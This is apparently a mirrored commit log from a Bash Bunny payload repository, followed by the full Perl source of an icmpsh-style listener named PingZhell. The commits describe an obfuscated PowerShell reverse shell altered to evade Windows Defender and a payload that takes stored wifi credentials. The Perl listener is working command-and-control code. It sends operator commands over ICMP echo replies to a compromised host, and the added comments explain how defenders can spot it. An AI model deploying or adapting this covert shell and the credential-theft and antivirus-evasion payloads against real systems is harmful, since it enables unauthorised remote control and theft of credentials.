mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhell
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
# Listener half of an icmpsh-style channel: it reads ICMP echo requests from a
# raw socket, prints each request's payload, and answers with an echo reply
# whose payload is whatever line is currently available on STDIN.
#
# Defender's view: a normal echo reply returns the request's data unchanged
# (RFC 792). Here the reply payload is replaced with operator input, so echo
# request/reply pairs whose payloads differ are the network-visible sign of
# this channel.
print "Bunny waitin' for connection...\n";

# Blocking raw socket on the ICMP protocol; opening one normally requires
# elevated privileges.
my $sock = IO::Socket::INET->new(
    Type     => SOCK_RAW,
    Proto    => "ICMP",
    Blocking => 1,
) or die "$!";

# STDIN is switched to non-blocking so the <STDIN> read inside the loop does
# not wait for the operator.
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";

print "Let's wait for PingZhell!\n";

my $input = '';
for (;;) {
    my $buffer;
    next unless $sock->recv($buffer, 4096, 0);

    # The buffer is decoded as an IP datagram first, then its payload as ICMP.
    my $ip   = NetPacket::IP->decode($buffer);
    my $icmp = NetPacket::ICMP->decode($ip->{data});

    # Only echo requests are handled; every other ICMP type is ignored.
    next unless $icmp->{type} == ICMP_ECHO;

    # The first two 16-bit fields are the identifier and sequence number;
    # everything after them is the payload sent by the peer.
    my ($ident, $seq, $data) = unpack("SSa*", $icmp->{data});

    # NOTE(review): there is no check on source address or identifier, so any
    # echo request that reaches this socket is written to the terminal
    # unfiltered and answered with the operator's input.
    print $data;
    $input = <STDIN>;

    # Reuse the decoded packet as the reply: same identifier and sequence
    # number, new type, payload swapped for the line read from STDIN.
    $icmp->{type} = ICMP_ECHOREPLY;
    $icmp->{data} = pack("SSa*", $ident, $seq, $input);

    # The reply goes back to the source address taken from the IP header.
    my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
    $sock->send($icmp->encode(), 0, $addr) or die "$!\n";
}